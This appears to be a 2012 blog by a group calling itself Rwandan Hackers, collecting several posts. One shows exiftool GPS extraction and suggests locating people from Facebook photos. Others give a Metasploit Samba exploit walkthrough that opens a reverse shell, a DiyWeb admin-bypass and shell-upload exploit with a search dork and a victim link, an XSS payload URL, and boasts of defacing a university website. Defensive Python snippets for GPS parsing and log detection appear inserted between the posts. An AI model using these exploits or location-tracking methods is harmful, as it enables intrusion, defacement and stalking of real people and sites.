Saturday, September 15, 2012

Extracting MetaData from photos using exiftool

                                              Hello Rwandans !!!!!

In this post I will show you how to extract metadata from photos to see exactly where you took the photo.


Also note that this method is used in the forensic analysis of images to help solve many "crimes": you can get the real data, the exact date and time, the location, the name of the camera, the modification date if the image was edited, and all the other fields stored in it, which leads to tangible results.

The tool is located in the menu structure under Digital Forensics, or through:

Applications - BackTrack - Forensics - Forensics Analysis Tools - Exiftool

The image I used is called fotografia.jpg and is in the images folder.

The path is as follows: ~/images/fotografia.jpg

The command is: ./exiftool -a ~/images/fotografia.jpg
You can see a lot of data, such as the date and time the image was taken and everything else I mentioned above, as well as the fact that the photo was taken with a SAMSUNG.


In this case, we want to know where the photo was taken, so copy the GPS data, which is:

GPS Latitude: 42° 24' 54.91" N
GPS Longitude: 83 deg 25' 21.36" W
GPS: 42° 24' 54.91" N, 83° 25' 21.36" W


As we can see, this photo was taken at Laurel Park Dr, Livonia, MI 48152, USA.
A cool thing to do is take pictures from Facebook and use this method to find GPS coordinates.
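For checking whether a photo leaks its location before it is published, the GPS lines that exiftool prints can be parsed and converted to decimal degrees. This is an added example, not part of the original post; the sample output is constructed from the values shown above and the function names are hypothetical.

```python
import re

# Constructed sample of `exiftool -a` text output, using the GPS values shown above.
SAMPLE_OUTPUT = '''\
File Name                       : fotografia.jpg
Make                            : SAMSUNG
GPS Latitude                    : 42 deg 24' 54.91" N
GPS Longitude                   : 83 deg 25' 21.36" W
'''

# Matches the degrees/minutes/seconds rendering ("deg" or the degree sign).
DMS_RE = re.compile(
    r"(?P<deg>\d+(?:\.\d+)?)\s*(?:deg|°)\s*"
    r"(?P<min>\d+(?:\.\d+)?)\s*'\s*"
    r"(?P<sec>\d+(?:\.\d+)?)\s*\"\s*"
    r"(?P<ref>[NSEW])"
)

def dms_to_decimal(value):
    """Convert one DMS string to signed decimal degrees (S and W are negative)."""
    m = DMS_RE.search(value)
    if m is None:
        raise ValueError(f"not a DMS coordinate: {value!r}")
    minutes, seconds = float(m["min"]), float(m["sec"])
    if minutes >= 60 or seconds >= 60:
        raise ValueError(f"minutes/seconds out of range: {value!r}")
    decimal = float(m["deg"]) + minutes / 60 + seconds / 3600
    return -decimal if m["ref"] in "SW" else decimal

def parse_tags(output):
    """Turn 'Tag Name : value' lines into a dict; with -a duplicates, the first wins."""
    tags = {}
    for line in output.splitlines():
        name, sep, value = line.partition(":")
        if sep:
            tags.setdefault(name.strip(), value.strip())
    return tags

def gps_position(output):
    """Return (lat, lon) in decimal degrees, or None when no GPS tags are present."""
    tags = parse_tags(output)
    if "GPS Latitude" not in tags or "GPS Longitude" not in tags:
        return None
    return (dms_to_decimal(tags["GPS Latitude"]),
            dms_to_decimal(tags["GPS Longitude"]))

if __name__ == "__main__":
    print(gps_position(SAMPLE_OUTPUT))
```

A result of None means the file carries no GPS tags; any other result is a position that travels with the file wherever it is shared.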


Enjoy

                                                          RWANDAN HACKERS


Exploiting Samba Server On Backtrack 5



Aim
The main aim of this tutorial is to exploit the Samba server.
Identifying Samba Services
To identify Samba services running on the remote system, we use nmap.
Command Used: nmap -sV 192.168.118.138
After scanning, it shows that port 139 and port 445 use Samba services.
See the image below for more details.



Msfconsole
Open msfconsole through a terminal.
Command Used: msfconsole
After entering the command, your 'msfconsole' will open as shown below.

Search Samba Exploit
To search for a Samba exploit, enter the command given below.
Command used to search for a Samba exploit: search samba
As you press the Enter key, it shows the different exploits related to Samba.
From the exploits, select the one which is highlighted in the image below.
See the image below for more help.

Use Exploit
Exploit Used: use exploit/multi/samba/usermap_script
See the image below for more details.



Show Options
Command Used: show options
This command shows that RHOST is not set, so the next step is to set the remote host.
See the image below for more details.


Rhost
Command Used: set RHOST <Remote IP Address>
See the image below for more details.



Payload
Command Used: show payloads
See the image below and set the highlighted payload.
See the image below for more details.





Set Payload
Command Used: set payload cmd/unix/reverse


Show Options
Command Used: show options
Now set the LHOST (local host address).




Set LHOST
Command Used: set LHOST <Your IP Address>



Lport
Command Used: set LPORT 445





Command Used
After getting a session, you can use commands as shown below.
See the image below.







Monday, September 3, 2012

A picture of President Kagame of Rwanda labelled a war criminal by the hackers into the Agriculture Ministry website



The ministry of agriculture website has been pulled down after hackers infiltrated it and posted messages calling for presidents Yoweri Museveni of Uganda and Paul Kagame of Rwanda to stop supporting war in the Democratic Republic of Congo.

The hackers, one of whom identified himself as Jeannot Kabuya, posted a string of statements written in French and calling for an end to the violence in DR Congo.

Some of the messages posted on the site, www.agriculture.go.ug, say Congo is not for sale.

The hackers also posted a string of pictures labeling the two presidents as well as Congolese rebel leader Bosco Ntaganda as killers who are wanted for war crimes. Ntaganda has been heading the M23 rebels who in April this year launched a rebellion against the Joseph Kabila government.

Other messages posted on the site say the hackers are anonymous, they do not forgive and they do not forget.

Connie Achayo, the agriculture ministry spokesperson, says that they have decided to pull down the website as they investigate the origin of the messages and possible motive of the hackers.

Fred Opolot, the director at the Uganda Media Centre, says he is aware of the move by hackers but is getting in touch with the public relations officer at the ministry of agriculture to pull down the site.

Earlier, Information minister Mary Karooro Okurut said she was not aware of the development but was getting in touch with the ministry officials to furnish her with details.

President Kagame of Rwanda and Kabila of DR Congo are expected to meet Museveni in Kampala on Tuesday this week to try and ease tension in the region. Congo accuses Rwanda of supporting the M23 rebels, a claim Rwanda dismisses.

On February 29th this year, the website of the Ministry of Works was briefly pulled down after a hacker posted a picture of FDC leader Kizza Besigye seated on a stool in a pensive mood. The image stayed on the site for several hours until the website was pulled down at about 5pm.

In May 2010, a hacker going by the name Kaka Argentine posted a photo of Adolf Hitler with a Nazi party symbol on his chest on the State House website. In 2010, hackers calling themselves “the Ayyildiz team” posted pro-Palestine items on the website of the Ministry of Defence, accusing Israel of killing innocent Palestinians.

Thursday, August 30, 2012

DiyWeb Admin Bypass and Remote file/shell Upload exploit


Exploit title: DiyWeb Admin Bypass & file Upload exploit
Discovered By: NoentryPhc
Server: windows
Type: web application
Shell extension: .asp

Dork : "Power by DiyWeb"
            inurl:/template.asp?menuid=
Poc : diyweb/menu/admin/image_manager.asp
Almost all websites vulnerable to this exploit are Malaysian.
To upload your files go to: http://www.website.com/diyweb/menu/admin/image_manager.asp and upload your shell/deface there!
If the .php extension is not allowed then you can try Tamper Data and Live HTTP Headers.
To access your file go to: http://www.website.com/Images/yourfilehere and sometimes you have to find your file manually on the website.
Link:http://www.famosapadu.com.my/images/index.html
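For site owners running DiyWeb, the two paths named in this post are what to look for in the web server logs: uploads through the admin image manager, and script or HTML pages then served from the Images directory. The following detection sketch is an added example, not part of the original post; the log excerpt is constructed, and the extension lists and function name are assumptions.

```python
# Constructed IIS W3C log excerpt; IPs and file names are made up for the example.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2012-08-30 10:01:12 203.0.113.7 GET /template.asp 200
2012-08-30 10:02:40 203.0.113.7 GET /diyweb/menu/admin/image_manager.asp 200
2012-08-30 10:03:05 203.0.113.7 POST /diyweb/menu/admin/image_manager.asp 200
2012-08-30 10:03:30 203.0.113.7 GET /Images/x.asp 200
2012-08-30 10:04:00 198.51.100.9 GET /Images/logo.jpg 200
2012-08-30 10:05:00 198.51.100.9 GET /Images/index.html 200
"""

ADMIN_UPLOAD_PAGE = "/diyweb/menu/admin/image_manager.asp"  # path named in the post
UPLOAD_DIR = "/images/"                  # uploads are served from here (compared lowercase)
SCRIPT_EXTS = (".asp", ".aspx", ".php")  # assumption: server-side script types to flag
HTML_EXTS = (".html", ".htm")            # assumption: page types an image folder should not serve

def find_suspicious(log_text):
    """Return (client_ip, uri, reason) for each request matching the pattern in the post."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]    # column order is declared by the log itself
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        stem = row.get("cs-uri-stem", "").lower()
        method = row.get("cs-method", "")
        status = row.get("sc-status", "")
        if stem == ADMIN_UPLOAD_PAGE and method == "POST":
            reason = "upload via admin image manager"
        elif stem.startswith(UPLOAD_DIR) and stem.endswith(SCRIPT_EXTS):
            reason = "script requested from upload directory"
        elif stem.startswith(UPLOAD_DIR) and stem.endswith(HTML_EXTS) and status == "200":
            reason = "HTML page served from upload directory"
        else:
            continue
        hits.append((row.get("c-ip"), row["cs-uri-stem"], reason))
    return hits

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit)
```

Any hit for the admin page from an address that is not a known administrator means the page is reachable without authentication and should be restricted; files flagged under the Images directory should be reviewed and removed.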

Google Website Vulnerable to XSS

Link:http://commondatastorage.googleapis.com/chromium-browser-continuous/index.html?path=%22%3E%3Cscript%3Ealert%28%27XSS-BY-RWANDAN-HACKERS%27%29%3C/script%3E

We discovered a cross-site scripting (XSS) vulnerability in a Google website. We already reported the vulnerability to a Google security expert.

Wednesday, August 29, 2012

Biochemistry - Makerere University website HACKED !!!

 Link:http://biochemistry.mak.ac.ug/start/index.php
Makerere University Department Of Biochemistry hacked by Rwandan Hackers
Dedications to "UGANDAN HACKERS"

                                                            ADMIN PANEL